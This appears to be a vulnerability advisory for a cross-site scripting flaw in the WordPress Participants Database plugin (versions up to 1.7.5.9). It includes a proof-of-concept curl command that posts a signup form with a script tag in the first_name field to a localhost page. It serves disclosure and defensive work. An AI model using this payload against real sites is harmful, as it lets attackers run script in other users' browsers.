WordPress Plugin Vulnerabilities
Participants Database <= 1.7.5.9 - Cross-Site Scripting
Description
Cross-site scripting (XSS) vulnerability in the WordPress Participants
Database plugin 1.7.5.9 allows attackers to inject arbitrary JavaScript via
the Name parameter.
Proof of Concept
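# Values are quoted so the shell does not interpret <, >, ; or ?.
# first_name uses --form-string because -F treats a leading '<' as "read from file".
curl -k \
  -F 'action=signup' \
  -F 'subsource=participants-database' \
  -F 'shortcode_page=/?page_id=1' \
  -F 'thanks_page=/?page_id=1' \
  -F 'instance_index=2' \
  -F 'pdb_data_keys=1.2.9.10' \
  -F 'session_hash=0123456789' \
  --form-string 'first_name=<script>alert("1");</script>' \
  -F 'last_name=a' \
  -F 'email=a@a.com' \
  -F 'mailing_list=No' \
  -F 'submit_button=Submit' \
  'http://localhost/?page_id=1'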
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Benjamin Lim
Submitter website
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-09-06 (about 6 years ago)
Added
2017-09-06 (about 6 years ago)
Last Updated
2020-09-22 (about 3 years ago)